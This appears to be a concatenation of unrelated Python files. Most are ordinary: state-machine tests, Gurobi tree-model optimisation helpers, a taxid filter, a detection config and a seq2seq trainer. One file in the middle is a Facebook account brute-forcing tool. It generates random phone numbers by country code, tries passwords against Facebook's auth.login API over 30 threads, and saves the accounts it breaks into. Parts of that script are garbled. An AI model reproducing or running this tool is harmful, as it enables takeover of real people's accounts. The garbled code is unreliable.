).filter_by(
name=label.name,
state_machine=label.state_machine,
).scalar()
with mock_test_feed(), app.new_session():
state_machine.update_metadata_for_label(
app,
label,
{'foo': 'bar'},
)
second_updated = app.session.query(
Label.updated,
).filter_by(
name=label.name,
state_machine=label.state_machine,
).scalar()
assert second_updated > first_updated
def test_continues_after_time_since_entering_gate(app, current_state):
label = LabelRef('foo', 'test_machine_timing')
gate = app.config.state_machines['test_machine_timing'].states[0]
with freeze_time('2018-01-24 12:00:00'), app.new_session():
state_machine.create_label(
app,
label,
{},
)
# 1 day later, not enough to progress
with freeze_time('2018-01-25 12:00:00'), app.new_session():
process_gate(
app=app,
state=gate,
state_machine=state_machine,
label=label,
)
assert current_state(label) == 'start'
# 2 days later
with freeze_time('2018-01-26 12:00:00'), app.new_session():
process_gate(
app=app,
state=gate,
state_machine=state_machine,
label=label,
)
assert current_state(label) == 'end'
def test_delete_label(app, assert_history, mock_test_feed):
label_foo = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(app, label_foo, {})
state_machine.delete_label(app, label_foo)
with app.new_session():
with pytest.raises(DeletedLabel):
state_machine.get_label_metadata(
app,
label_foo,
)
assert_history([
(None, 'start'),
('start', None),
])
def test_delete_label_idempotent(app, assert_history, mock_test_feed):
label_foo = LabelRef('foo', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(app, label_foo, {})
state_machine.delete_label(app, label_foo)
state_machine.delete_label(app, label_foo)
with app.new_session():
with pytest.raises(DeletedLabel):
state_machine.get_label_metadata(
app,
label_foo,
)
assert_history([
(None, 'start'),
('start', None),
])
def test_delete_label_only_deletes_target_label(app, assert_history, mock_test_feed):
label_foo = LabelRef('foo', 'test_machine')
label_bar = LabelRef('bar', 'test_machine')
with mock_test_feed(), app.new_session():
state_machine.create_label(app, label_foo, {})
state_machine.create_label(app, label_bar, {})
state_machine.delete_label(app, label_foo)
with app.new_session():
with pytest.raises(DeletedLabel):
state_machine.get_label_metadata(
app,
label_foo,
)
state_machine.get_label_metadata(
app,
label_bar,
)
def test_handles_label_state_change_race_condition(app, create_deleted_label):
test_machine = app.config.state_machines['test_machine']
state = test_machine.states[1]
# Create a label which is not in the expected state. Doing this and then
# returning the affected label from the `get_labels` call is easier and
# equivalent to having the state of the label change between the return of
# that call and when the label is used.
label = create_deleted_label('foo', 'test_machine')
mock_processor = mock.Mock()
mock_get_labels = mock.Mock(return_value=[label.name])
with mock.patch(
'routemaster.state_machine.api.suppress_exceptions',
):
state_machine.process_cron(
mock_processor,
mock_get_labels,
app,
test_machine,
state,
)
# Assert no attempt to process the label
mock_processor.assert_not_called()
|
StarcoderdataPython
|
6664529
|
from litex.soc.cores.cpu.blackparrot.core import BlackParrot
|
StarcoderdataPython
|
3438788
|
from gurobipy import GRB, quicksum
import gurobipy as gp
def get_core_gurobi_model(space, add_model_core=None):
"""Add core to gurobi model, i.e. bounds, variables and parameters.
Parameters
----------
space : scikit-optimize object
Captures the feature space
model : gurobipy.Model,
Model to which the core is added.
Returns
-------
-
"""
if add_model_core is None:
model = gp.Model()
x_lb = [bound[0] for bound in space.bounds]
x_ub = [bound[1] for bound in space.bounds]
model._c_x_lb = x_lb
model._c_x_ub = x_ub
n_features = len(x_lb)
feature_numbers = range(n_features)
model._n_feat = n_features
model._c_x = \
model.addVars(feature_numbers,
lb=x_lb,
ub=x_ub, name="c_x", vtype='C')
model.update()
return model
else:
# validate model core input
assert type(add_model_core) is gp.Model, \
"wrong model core type given, please create model core using: " + \
"entmoot.optimizer.gurobi_utils.add_core_to_gurobi_model(..."
check_attributes = \
hasattr(add_model_core,"_c_x_lb") and \
hasattr(add_model_core,"_c_x_ub") and \
hasattr(add_model_core,"_n_feat") and \
hasattr(add_model_core,"_c_x")
assert check_attributes, \
"model core was not configured correctly, please create model core using: " + \
"entmoot.optimizer.gurobi_utils.add_core_to_gurobi_model(..."
return add_model_core
def add_std_to_gurobi_model(est, model):
"""Adds standard estimator formulation to gurobi model.
Parameters
----------
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
model : gurobipy.Model,
Model to which the core is added.
Returns
-------
-
"""
est.std_estimator.add_to_gurobi_model(model)
model.update()
def set_gurobi_init_to_ref(est, model):
"""Sets intial values of gurobi model variables to the reference points.
Parameters
----------
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
model : gurobipy.Model,
Model to which the core is added.
Returns
-------
-
"""
ref_points_unscaled = \
est.std_estimator.ref_points_unscaled
best_val = est.predict(ref_points_unscaled[0].reshape(1, -1))
best_ref = ref_points_unscaled[0]
for ref_point in ref_points_unscaled:
temp_val = est.predict(ref_point.reshape(1, -1))
if best_val > temp_val:
best_val = temp_val
best_ref = ref_point
n_features = len(model._c_x)
for i in range (n_features):
model._c_x[i].start = best_ref[i]
model._alpha.start = 0.0
model.update()
def add_acq_to_gurobi_model(model, est, acq_func="LCB", acq_func_kwargs=None):
"""Sets gurobi model objective function to acquisition function.
Parameters
----------
model : gurobipy.Model
Model to which the core is added.
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
acq_func : str
Type of acquisition function used for gurobi model objective
acq_func_kwargs : dict
Allows additional parameter settings for acquisition function
Returns
-------
-
"""
# check inputs
if acq_func_kwargs is None:
acq_func_kwargs = dict()
# read kappa parameter
kappa = acq_func_kwargs.get("kappa", 1.96)
# collect objective contribution for tree model and std estimator
mu, std = get_gurobi_obj(
model, est, return_std=True, acq_func_kwargs=acq_func_kwargs
)
ob_expr = quicksum((mu, kappa*std))
model.setObjective(ob_expr,GRB.MINIMIZE)
def get_gurobi_obj(model, est, return_std=False, acq_func_kwargs=None):
"""Returns gurobi model objective contribution of tree model and std
estimator.
Returns tree model objective contribution if `return_std` is set to False.
If `return_std` is set to True, then return tree model and std estimator
contribution to gurobi model objective.
Parameters
----------
model : gurobipy.Model
Model to which the core is added.
est : EntingRegressor object
Has both tree model and uncertainty estimate embedded
return_std : bool
Set `True` to return both tree model and std estimator contribution
Returns
-------
mean or (mean, std): gurobipy.expr, or tuple(gurobipy.expr, gurobipy.expr),
depending on value of `return_std`.
"""
scaled = acq_func_kwargs.get("scaled", False)
mean = get_gbm_obj(model)
if return_std:
std = est.std_estimator.get_gurobi_obj(model, scaled=scaled)
return mean, std
return mean
def get_gbm_obj(model):
"""Returns objective of `gbm_model` specified in gurobi model.
Parameters
----------
model : gurobipy.Model
Model to which the core is added.
Returns
-------
ob_expr: gurobipy.expr
Defines the gurobipy expression corresponding to the tree model objective
contribution.
"""
weighted_sum = quicksum(
model._leaf_weight(label, tree, leaf) * \
model._z_l[label, tree, leaf]
for label, tree, leaf in leaf_index(model)
)
ob_expr = weighted_sum
return ob_expr
### GBT HANDLER
## gbt model helper functions
def tree_index(model):
for label in model._gbm_set:
for tree in range(model._num_trees(label)):
yield (label, tree)
tree_index.dimen = 2
def leaf_index(model):
for label, tree in tree_index(model):
for leaf in model._leaves(label, tree):
yield (label, tree, leaf)
leaf_index.dimen = 3
def misic_interval_index(model):
for var in model._breakpoint_index:
for j in range(len(model._breakpoints(var))):
yield (var, j)
misic_interval_index.dimen = 2
def misic_split_index(model):
gbm_models = model._gbm_models
for label, tree in tree_index(model):
for encoding in gbm_models[label].get_branch_encodings(tree):
yield (label, tree, encoding)
misic_split_index.dimen = 3
def alt_interval_index(model):
for var in model.breakpoint_index:
for j in range(1, len(model.breakpoints[var])+1):
yield (var, j)
alt_interval_index.dimen = 2
def add_gbm_to_gurobi_model(gbm_model_dict, model):
add_gbm_parameters(gbm_model_dict, model)
add_gbm_variables(model)
add_gbm_constraints(model)
def add_gbm_parameters(gbm_model_dict, model):
model._gbm_models = gbm_model_dict
model._gbm_set = set(gbm_model_dict.keys())
model._num_trees = lambda label: \
gbm_model_dict[label].n_trees
model._leaves = lambda label, tree: \
tuple(gbm_model_dict[label].get_leaf_encodings(tree))
model._leaf_weight = lambda label, tree, leaf: \
gbm_model_dict[label].get_leaf_weight(tree, leaf)
vbs = [v.get_var_break_points() for v in gbm_model_dict.values()]
all_breakpoints = {}
for i in range(model._n_feat):
s = set()
for vb in vbs:
try:
s = s.union(set(vb[i]))
except KeyError:
pass
if s:
all_breakpoints[i] = sorted(s)
model._breakpoint_index = list(all_breakpoints.keys())
model._breakpoints = lambda i: all_breakpoints[i]
model._leaf_vars = lambda label, tree, leaf: \
tuple(i
for i in gbm_model_dict[label].get_participating_variables(
tree, leaf))
def add_gbm_variables(model):
model._z_l = model.addVars(
leaf_index(model),
lb=0,
ub=GRB.INFINITY,
name="z_l", vtype='C'
)
model._y = model.addVars(
misic_interval_index(model),
name="y",
vtype=GRB.BINARY
)
model.update()
def add_gbm_constraints(model):
def single_leaf_rule(model_, label, tree):
z_l, leaves = model_._z_l, model_._leaves
return (quicksum(z_l[label, tree, leaf]
for leaf in leaves(label, tree))
== 1)
model.addConstrs(
(single_leaf_rule(model, label, tree)
for (label,tree) in tree_index(model)),
name="single_leaf"
)
def left_split_r(model_, label, tree, split_enc):
gbt = model_._gbm_models[label]
split_var, split_val = gbt.get_branch_partition_pair(
tree,
split_enc
)
y_var = split_var
y_val = model_._breakpoints(y_var).index(split_val)
return quicksum(
model_._z_l[label, tree, leaf]
for leaf in gbt.get_left_leaves(tree, split_enc)
) <= model_._y[y_var, y_val]
def right_split_r(model_, label, tree, split_enc):
gbt = model_._gbm_models[label]
split_var, split_val = gbt.get_branch_partition_pair(
tree,
split_enc
)
y_var = split_var
y_val = model_._breakpoints(y_var).index(split_val)
return quicksum(
model_._z_l[label, tree, leaf]
for leaf in gbt.get_right_leaves(tree, split_enc)
) <= 1 - model_._y[y_var, y_val]
def y_order_r(model_, i, j):
if j == len(model_._breakpoints(i)):
return Constraint.Skip
return model_._y[i, j] <= model_._y[i, j+1]
def var_lower_r(model_, i, j):
lb = model_._c_x[i].lb
j_bound = model_._breakpoints(i)[j]
return model_._c_x[i] >= lb + (j_bound - lb)*(1-model_._y[i, j])
def var_upper_r(model_, i, j):
ub = model_._c_x[i].ub
j_bound = model_._breakpoints(i)[j]
return model_._c_x[i] <= ub + (j_bound - ub)*(model_._y[i, j])
model.addConstrs(
(left_split_r(model, label, tree, encoding)
for (label, tree, encoding) in misic_split_index(model)),
name="left_split"
)
model.addConstrs(
(right_split_r(model, label, tree, encoding)
for (label, tree, encoding) in misic_split_index(model)),
name="right_split"
)
model.addConstrs(
(y_order_r(model, var, j)
for (var, j) in misic_interval_index(model)
if j != len(model._breakpoints(var))-1),
name="y_order"
)
model.addConstrs(
(var_lower_r(model, var, j)
for (var, j) in misic_interval_index(model)),
name="var_lower"
)
model.addConstrs(
(var_upper_r(model, var, j)
for (var, j) in misic_interval_index(model)),
name="var_upper"
)
|
StarcoderdataPython
|
11340635
|
#!/usr/bin/python2
#coding=utf-8
#Author <NAME>
#Ngapain??
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### LOGO #####
lo
\033[1;97m░█████╗░ ░█████╗░███╗░░██╗██╗░░░██╗
\033[1;97m██╔══██╗ ██╔══██╗████╗░██║██║░░░██║
\033[1;97m███████║ ███████║██╔██╗██║██║░░░██║
\033[1;97m██╔══██║ ██╔══██║██║╚████║██║░░░██║
\033[1;97m██║░░██║ ██║░░██║██║░╚███║╚██████╔╝
\033[1;97m╚═╝░░╚═╝ ╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m ASHIK & LEJON KHAN OFFICIAL
\033[1;97m--------------------------------------------------
\033[1;97m➣ Author : <NAME>
\033[1;97m➣ Version : V1.1.1
\033[1;97m➣ Facebook :www.facebook.com/aashikbanaya.aa10
\033[1;97m➣ Help : Any Help Contact Me On Facebook.
\033[1;97m--------------------------------------------------
'''
correctname = ASHIK
CorrectPassword = <PASSWORD>
os.system('clear')
print logo
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m➣ Username Tools : ")
if (username == CorrectUsername):
password = raw_input("\033[1;97m➣ Password Tools : ")
if (password == CorrectPassword):
print "[✓] Logged in successfully as \n " + username
loop = 'false'
else:
print "Wrong Password"
else:
print "Wrong Username"
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print '\033[1;97m[1]\033[1;97m Bangladesh'
print '\033[1;97m[2]\033[1;97m USA'
print '\033[1;97m[3]\033[1;97m UK'
print '\033[1;97m[4] \033[1;97m India'
print '\033[1;97m[5]\033[1;97m Brazil'
print '\033[1;97m[6]\033[1;97m Japan'
print '\033[1;97m[7]\033[1;97m Korea'
print '\033[1;97m[8]\033[1;97m Italy'
print '\033[1;97m[9]\033[1;97m Spain'
print '\033[1;97m[10]\033[1;97m Poland'
print '\033[1;97m[11]\033[1;97m Pakistan'
print '\033[1;97m[12]\033[1;97m Indonesia'
print '\033[1;97m[13]\033[1;97m Iran'
print '\033[1;97m[14]\033[1;97m Grecee'
print '\033[1;97m[0] Exit '
print "\033[1;97m--------------------------------------------------\n"
action()
def action():
bch = raw_input('\n\033[1;97m▄︻̷̿┻̿═━一 ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print("\033[1;97m175,165,191,192,193,194,195,196,197,198,199")
try:
c = raw_input("\033[1;97m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print("786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input(" choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print("737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" choose code : ")
k="+44"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system("clear")
print (logo)
print("954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
print("901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" choose code : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="5":
os.system("clear")
print (logo)
print("127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input(" choose code : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="6":
os.system("clear")
print (logo)
print("11,12,19,16,15,13,14,18,17")
try:
c = raw_input(" choose code : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="7":
os.system("clear")
print (logo)
print("1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input(" choose code : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="8":
os.system("clear")
print (logo)
print("388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input(" choose code : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="9":
os.system("clear")
print (logo)
print("60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input(" choose code : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="10":
os.system("clear")
print (logo)
print("66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input(" choose code : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="11":
os.system("clear")
print (logo)
print("\033[1;97mJazz Bangladesh : 00,01,02,03,04,05,06,07,08,09")
print("\033[1;97mZong Bangladesh : 10,11,12,13,14,15,16,17,18")
print("\033[1;97mWarid Bangladesh : 20,21,22,23,24")
print("\033[1;97mUfone Bangladesh : 30,31,32,33,34,35,36,37")
print("\033[1;97mTelenor Bangladesh : 40,41,42,43,44,45,46,47,48,49")
try:
c = raw_input(" choose code : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="12":
os.system("clear")
print (logo)
print("\033[1;97m81, 83, 85, 84, 89,")
try:
c = raw_input(" choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="13":
os.system("clear")
print (logo)
print("\033[1;97m901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" choose code : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="14":
os.system("clear")
print (logo)
print("\033[1;97m69, 693, 698, 694, 695")
try:
c = raw_input(" choose code : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="15":
os.system("clear")
print (logo)
print("\033[1;97mJazz Pakistan: 00,01,02,03,04,05,06,07,08,09")
print("\033[1;97mZong Pakistan: 10,11,12,13,14,15,16,17,18")
print("\033[1;97mWarid Pakistan: 20,21,22,23,24")
print("\033[1;97mUfone Pakistan: 30,31,32,33,34,35,36,37")
print("\033[1;97mTelenor Pakistan: 40,41,42,43,44,45,46,47,48,49")
try:
c = raw_input(" choose code : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('\033[1;97m[✓]\033[1;97m Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] To Stop Process Press CTRL Then Press z')
time.sleep(0.5)
print "\033[1;97m--------------------------------------------------"
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[LOGIN]\033[1;97m ' + k + c + user + ' | ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'⊱⊹⊰'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[7 DAYS] ' + k + c + user + ' | ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'⊱⊹⊰'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m--------------------------------------------------"
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
menu()
if __name__ == '__main__':
menu()
|
StarcoderdataPython
|
1606923
|
#!/usr/bin/env python
"""
Get a list of taxids that have data sizes above some threshold.
:Authors:
<NAME> <<EMAIL>>
"""
import argparse
import datetime
import sys
from ast import literal_eval
def process_file(file_location, threshold=10000000):
"""
Process a balance_data.py file looking for taxids that have too much data.
Parameters
----------
file_location: str
The location of a balance_data.py file.
threshold: int
The maximum data size to look for.
Returns
-------
too_large: list
A list of taxonomic ids
"""
too_large = []
with open(file_location) as fdr:
for line in fdr:
if line.startswith("("):
line = line.strip()
taxid_tuple = literal_eval(line)
if taxid_tuple[1] == 'train' and taxid_tuple[2] > threshold:
too_large.append((taxid_tuple[0], taxid_tuple[2]))
return too_large
def main():
"""Parse the arguments."""
tic = datetime.datetime.now()
parser = argparse.ArgumentParser(
description=('Examine a balance_data.py output file and '
'look for taxids with data sizes that are too large.'))
parser.add_argument("file",
type=str,
help=("The output of balance_data.py"))
parser.add_argument("--threshold",
"-t",
type=int,
help=("The maximum size of a data set."),
default=10000000)
args = parser.parse_args()
print(args, file=sys.stderr)
output = process_file(args.file, args.threshold)
for taxid in output:
print(taxid[0], file=sys.stdout)
print(taxid, file=sys.stderr)
toc = datetime.datetime.now()
print("The process took time {}.".format(toc - tic), file=sys.stderr)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3480108
|
_base_ = [
'../../_base_/models/universenet50_2008.py',
'../../_base_/datasets/coco_detection_mstrain_480_960.py',
'../../_base_/schedules/schedule_1x.py', '../../_base_/default_runtime.py'
]
model = dict(
pretrained=('https://shanghuagao.oss-cn-beijing.aliyuncs.com/res2net/'
'res2net50_26w_4s-06e79181.pth'),
backbone=dict(
type='Res2Net',
depth=50,
scales=4,
base_width=26,
num_stages=4,
out_indices=(0, 1, 2, 3),
deep_stem=False,
avg_down=False,
frozen_stages=1,
norm_cfg=dict(type='SyncBN', requires_grad=True),
norm_eval=False,
style='pytorch',
dcn=dict(type='DCN', deform_groups=1, fallback_on_stride=False),
stage_with_dcn=(False, False, False, True)))
data = dict(samples_per_gpu=4)
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(
_delete_=True, grad_clip=dict(max_norm=35, norm_type=2))
lr_config = dict(warmup_iters=1000)
fp16 = dict(loss_scale=512.)
|
StarcoderdataPython
|
11224469
|
<reponame>iotayo/aivivn-tone
import os
import gc
import random
import torch
import dill
import torch.nn as nn
import numpy as np
from torch.optim import Adam
from torchtext.data import BucketIterator
from dataset import Seq2SeqDataset, PAD, tgt_field_name
from model import Encoder, Decoder, Seq2SeqConcat
from cyclic_lr import CyclicLR
from visualization import Visualization
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
class Trainer:
def __init__(self, src_vocab, tgt_vocab,
max_len=300, hidden_size=300, n_layers=2, clip=5, n_epochs=30):
# hyper-parameters
self.max_len = max_len
self.hidden_size = hidden_size
self.n_layers = n_layers
self.clip = clip
self.n_epochs = n_epochs
# vocab
self.src_vocab = src_vocab
self.tgt_vocab = tgt_vocab
self.pad_idx = self.src_vocab.stoi[PAD]
# prepare model
self.encoder = Encoder(self.src_vocab, self.max_len, self.hidden_size, self.n_layers)
self.decoder = Decoder(self.tgt_vocab, self.max_len, self.hidden_size * 2, self.n_layers)
self.reverse_decoder = Decoder(self.tgt_vocab, self.max_len, self.hidden_size * 2, self.n_layers, reverse=True)
self.model = Seq2SeqConcat(self.encoder, self.decoder, self.reverse_decoder, self.pad_idx)
self.model.to(device)
print(self.model)
print("Total parameters:", sum([p.nelement() for p in self.model.parameters()]))
# initialize weights
for name, param in self.model.named_parameters():
if "lstm.bias" in name:
# set lstm forget gate to 1 (Jozefowicz et al., 2015)
n = param.size(0)
param.data[n//4:n//2].fill_(1.0)
elif "lstm.weight" in name:
nn.init.xavier_uniform_(param)
# prepare loss function; don't calculate loss on PAD tokens
self.criterion = nn.NLLLoss(ignore_index=self.pad_idx)
# prepare optimizer and scheduler
self.optimizer = Adam(self.model.parameters())
self.scheduler = CyclicLR(self.optimizer, base_lr=0.00001, max_lr=0.00005,
step_size_up=4000, step_size_down=4000,
mode="triangular", gamma=1.0, cycle_momentum=False)
# book keeping vars
self.global_iter = 0
self.global_numel = []
self.global_loss = []
self.global_acc = []
# visualization
self.vis_loss = Visualization(env_name="aivivn_tone", xlabel="step", ylabel="loss", title="loss (mean per 300 steps)")
self.vis_acc = Visualization(env_name="aivivn_tone", xlabel="step", ylabel="acc", title="training accuracy (mean per 300 steps)")
def train(self, train_iterator, val_iterator, start_epoch=0, print_every=100):
for epoch in range(start_epoch, self.n_epochs):
self._train_epoch(epoch, train_iterator, train=True, print_every=print_every)
self.save(epoch)
# evaluate on validation set after each epoch
with torch.no_grad():
self._train_epoch(epoch, val_iterator, train=False, print_every=print_every)
def train_in_parts(self, train_parts, val, val_iterator, batch_size, start_epoch=0, print_every=100):
for epoch in range(start_epoch, self.n_epochs):
# shuffle data each epoch
random.shuffle(train_parts)
for train_src_, train_tgt_ in train_parts:
# create train dataset
print("Training part [{}] with target [{}]...".format(train_src_, train_tgt_))
train_ = Seq2SeqDataset.from_file(train_src_, train_tgt_, share_fields_from=val)
# create iterator
train_iterator_ = BucketIterator(dataset=train_, batch_size=batch_size,
sort=False, sort_within_batch=True,
sort_key=lambda x: len(x.src),
shuffle=True, device=device)
# train
self._train_epoch(epoch, train_iterator_, train=True, print_every=print_every)
# clean
del train_
del train_iterator_
gc.collect()
# save
self.save(epoch)
# evaluate on validation set after each epoch
with torch.no_grad():
self._train_epoch(epoch, val_iterator, train=False, print_every=print_every)
def resume(self, train_iterator, val_iterator, save_path):
checkpoint = torch.load(save_path)
self.model.load_state_dict(checkpoint["model_state_dict"])
self.model.to(device)
self.optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
self.scheduler.load_state_dict(checkpoint["scheduler_state_dict"])
start_epoch = checkpoint["epoch"] + 1
self.train(train_iterator, val_iterator, start_epoch)
def resume_in_parts(self, train_parts, val, val_iterator, batch_size, save_path):
checkpoint = torch.load(save_path)
self.model.load_state_dict(checkpoint["model_state_dict"])
self.model.to(device)
self.optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
self.scheduler.load_state_dict(checkpoint["scheduler_state_dict"])
start_epoch = checkpoint["epoch"] + 1
self.train_in_parts(train_parts, val, val_iterator, batch_size, start_epoch=start_epoch)
def _train_epoch(self, epoch, batch_iterator, train=True, print_every=100):
if train:
self.model.train()
else:
self.model.eval()
print("***Evaluating on validation set***")
total_loss = 0
total_correct = 0
total_numel = 0
total_iter = 0
num_batch = len(batch_iterator)
for i, batch in enumerate(batch_iterator):
# forward propagation
# (batch, seq_len, tgt_vocab_size)
if train:
# crude annealing teacher forcing
teacher_forcing = 0.5
if epoch == 0:
teacher_forcing = max(0.5, (num_batch - total_iter) / num_batch)
output, reverse_output, combined_output = self.model(batch, mask_softmax=0.5, teacher_forcing=teacher_forcing)
else:
output, reverse_output, combined_output = self.model(batch, mask_softmax=1.0, teacher_forcing=1.0)
# (batch, seq_len)
target = getattr(batch, tgt_field_name)
# reshape to calculate loss
output = output.view(-1, output.size(-1))
reverse_output = reverse_output.view(-1, reverse_output.size(-1))
combined_output = combined_output.view(-1, combined_output.size(-1))
target = target.view(-1)
# calculate loss
loss = self.criterion(output, target) + self.criterion(reverse_output, target) + self.criterion(combined_output, target)
# backprop
if train:
self.optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(self.model.parameters(), self.clip)
self.optimizer.step()
self.scheduler.step()
# calculate accuracy
correct = output.argmax(dim=-1).eq(target).sum().item()
r_correct = reverse_output.argmax(dim=-1).eq(target).sum().item()
c_correct = combined_output.argmax(dim=-1).eq(target).sum().item()
# summarize for each batch
total_loss += loss.item()
total_correct += c_correct
total_numel += target.numel()
total_iter += 1
# add to global summary
if train:
self.global_iter += 1
self.global_numel.append(target.numel())
self.global_loss.append(loss.item())
self.global_acc.append(c_correct)
# visualize
if self.global_iter == 1:
self.vis_loss.plot_line(self.global_loss[0], 1)
self.vis_acc.plot_line(self.global_acc[0]/total_numel, 1)
# update graph every 10 iterations
if self.global_iter % 10 == 0:
# moving average of most recent 300 losses
moving_avg_loss = sum(self.global_loss[max(0, len(self.global_loss)-300):]) / min(300.0, self.global_iter)
